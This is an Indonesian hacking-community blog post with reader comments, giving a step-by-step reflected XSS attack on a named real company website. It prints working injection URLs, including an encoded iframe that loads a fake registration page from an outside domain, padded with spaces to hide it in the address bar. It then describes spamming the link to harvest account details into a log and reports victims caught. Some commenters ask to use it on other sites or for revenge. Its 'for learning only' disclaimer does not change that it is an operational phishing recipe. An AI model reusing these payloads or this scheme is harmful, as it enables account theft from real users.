Rabu, 18 Januari 2012

Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

XSS: Internet Explorer & Mozilla Firefox

21 May 2011
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner



248
 
8
 
257
share

Salam hangat untuk sahabat Binus Hacker semuanya,

Kali ini saya ingin berbagi pengalaman, bagaimana melakukan XSS di Internet Explorer 9 & Mozilla Firefox 4.01
Internet Explorer 9 Mozilla Firefox 4.0.1

Apa sih perbedaanya antara keduanya:

Oke yuk mari kita analisa bagaimana XSS ini dapat dilakukan,

Pertama: Internet Explorer 9

  1. Secara default, internet explorer 9 akan melakukan proteksi terhadap segala sesuatu yang berbau script, biasanya dalam code “<script></script>
  2. IE Memproteksi XSS
    Default setting XSS Filter

  3. Agar supaya kita dapat melakukan XSS, maka kita harus menon-aktifkan Anti-XSS Library, dengan melakukan “Disable” XSS Filter
  4. Disable XSS Filter

  5. Setelah di “Disable“, maka XSS Attack bisa dilakukan di Internet Explorer.
  6. XSS Bisa dilakukan di IE9

Kedua: Mozilla Firefox 4.0.1

  1. Mozilla Firefox tidak memiliki Anti-XSS Library, sehingga secara Default kita bisa langsung melakukan XSS.
  2. XSS on Mozilla

  3. Namun disediakan XSS Filter dari beberapa plug-in (Silakan dicari sendiri)

Oke, yuk mari kita coba seberapa powerfullnya XSS: Cross Site Scripting

Saya mau make Mozilla Firefox 4.0.1 aja deh.

Banyak yang bertanya, apa hebat & bahayanya sih XSS?
Yang tidak mengetahui & belum ber-eksperimen pasti bilang:

  • Apa hebatnya sih, cuman nulis di URL doank
  • Begituan mah gak ada gunanya
  • XSS mah gak bisa dideface halamannya
  • Itu kan cuman perubahan address doank

Saya hanya tersenyum ketika mendengar diskusi mengenai hal ini :)

Nah, dari sekian banyak bahayanya XSS, mari kita ambil salah satunya “STEALING ACCOUNT IN VULNERABLE WEBSITE“. (Harap Dijadikan Bahan Pembelajaran & Proteksi Diri Saja Ya, Artikel Ini Hanya Untuk Menambah Wawasan)

Dalam hal ini saya memanfaatkan XSS dikombinasikan dengan Human Vulnerability, karena semua pasti sudah mengetahui, bahwa Manusia Adalah Unpatched Vulnerability :)

Skenarionya adalah:

  1. Kita mendapatkan vulnerable website yang bisa dilakukan XSS
  2. Kita membuat sebuah script yang bisa digunakan untuk register / login & membuat sebuah file script (php) yang bisa digunakan untuk mengambil informasi account & menyimpannya di logs.
  3. Kita sebarkan linknya ke beberapa email / messenger / chatbox / irc, dsb.
  4. Tunggu & kita mendapatkannya deh :D

Langkah-langkahnya adalah:

Pertama

  • Saya menggunakan vulnerable XSS dari website www.eset.com.mx, ESET merupakan salah satu perusahaan AntiVirus yang juga sangat terkenal di Dunia, namun memiliki kelemahan juga di websitenya.
  • Test XSS apakah bisa berjalan di website, berikut contohnya: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ccenter%3E%3Cfont%20size=%22300%22%3EBinus%20Hacker%20Ada%20Disini%3Cbr%3Ehttp://www.binushacker.net%3C/font%3E%3C/center%3E%3C/
  • Test XSS For Binus Hacker

  • Test cookies (ternyata ada), berhubung artikelnya bukan stealing cookies, kita lewatin aja :)
  • Oke, sudah ketahuan websitenya vulnerable

Kedua

  • Dalam benak, banyak ide, antara login & register pages.
  • Akhirnya kembali coding, membuat  page halaman register di ESET
  • Fake Register Pages - Binus Hacker

  • Kemudian membuat php untuk menerima hasil & menyimpannya di log, berikut:
  • Script Log Untuk Menyimpan Hasil XSS

  • Fake register tadi yang saya buat saya simpan di: http://restinpeace.biz/eset/, permission filenya sudah disetting supaya tidak bisa dibaca filenya, hanya bisa melihat directorynya. Hhehe.. :D

Ketiga

  • Disini kita akan menggunakan html code <iframe>
  • Sebelum kita melakukan aksi, maka code XSS: “<iframe src=http://restinpeace.biz/eset/register.php width=1500>” di encode dulu menjadi: %3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E
  • Copy code tersebut ke URL sehingga menjadi: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E
  • Eset Node Iframe

  • Karena masih kelihatan di URL, maka kita tambahin menggunakan spasi (” “), sehingga URL iframe tidak tampak di address  karena kepanjangan: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E, sekarang tidak adak kelihatan lagi di URL Address script XSSnya.
  • Menghide URL Address

  • Sudah selesai page untuk fake register, lanjut ke step selanjutnya

Keempat

  • Sebarkan melalui email, chat, messenger dan sebagainya, silakan gunakan cara masing-masing. Anda disini belajar menjadi spammer & phiser (Ingat! Artikel ini hanya untuk pembelajaran, kita tidak akan lebih baik jika melakukan kejahatan, namun akan lebih berguna jika kita memiliki ilmu agar tidak terjebak & tertipu oleh penjahat!)

Kelima

  • Kita tunggu hasilnya & kita cek log yang masuk
  • Taaaadddddaaaaaa, ada beberapa yang masuk :D
  • Hasilnya & Jangan Lupa Follow Twitter

Download Source Code:

Download Source Code Xss Article BinusHacker

Kita tidak akan menjadi hebat dengan melakukan kejahatan, namun kita akan jauh lebih baik jika mengetahui ilmu pengetahuan, membagi dengan yang lain, memproteksi diri sendiri. Tuhan Akan Melihat Apa Yang Ada Pada Niat Yang Kita Lakukan Bukan Dari Pendapat Orang.

Jadi untuk semua selamat belajar & semoga bermanfaat.

Silakan Follow Twitter Saya Untuk Bertegur Sapa:
Follow Utuh Wibowo Twiiter

Thanks.. Enjoy & Eat It! :)

BINUS HACKER Binus Hacker Chat and Forum

Komentar

11 Komentar Untuk “XSS: Internet Explorer & Mozilla Firefox
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. ffaaddiill pada 22 May 2011 8:16 pm

    nice :D

    coba ahhh :D

  2. Kevin pada 23 May 2011 5:51 am

    bagus Mas Artikelnya.. belajar disini banyak manfaatnya.. heheh

  3. Lukas pada 25 May 2011 3:44 am

    bagus kakak… tapi ku msh kecil jd lum tau tuh paan
    btw XSS tuh apa si?

  4. anonim pada 12 June 2011 4:38 am

    bang gans, cara test script selain diatas gimana ya?? saya mau nyoba website yang laen gt. thanks kalo dijawab.

  5. Salah Satu Bahaya XSS: Stealing Account Information « Ary_Sagitarius_Boys pada 15 June 2011 9:10 am
  6. gusde pada 16 June 2011 12:36 am

    seep. Aku baca artikelnya setelah selesai malas melakukan karena muter2
    TETAPI aku akan belajar menjadi hacker “NEVER SAY NEVER”

  7. UtuH pada 25 June 2011 10:35 am

    Selamat belajar dan semoga bermanfaat, terus berjuang tingkatkan ilmu pengetahuan kalin.

  8. freeshare17 pada 25 July 2011 1:13 pm

    mantap banget gan, berhubung saya masih newbie cara membuat log nya gmn ya.. soalnya saya mau coba buat fb palsu. masih belum ngerti perintah-perintahnya.
    sebenarnya saya malas hack orang, tapi kemarin2x saya di tangtangin sama orang yang gak saya kenal. klo agan berkenan saya mau minta diajarin biar org sombong itu gak banyak omong lagi.

    mohon bantuanya y Pro Hacer

  9. dodik pada 25 July 2011 11:21 pm

    keren kang infonya tp ngak mudeng hehe.. masih blajar..

  10. desky pada 2 August 2011 8:48 pm

    infonya blh tp trllu pnjng dn kyanya ssush hrs bljr dlh

  11. Bluz pada 19 September 2011 12:58 am

    kakak…
    IE 8 ku 1 bulan lalu masih bisa donlod dari IDWS..
    tapi skarang kok gak isa…pas pencet download (yg sebelum waiting unduh itu lo) malah gak jalan ke page klik unduh nya itu kak…
    itu kenapa?
    ada tulisan
    “internet explorer has modified this page to help prevent cross site scripting….”

    cara ku download gimana kak?

Silahkan Berikan Tanggapan Anda...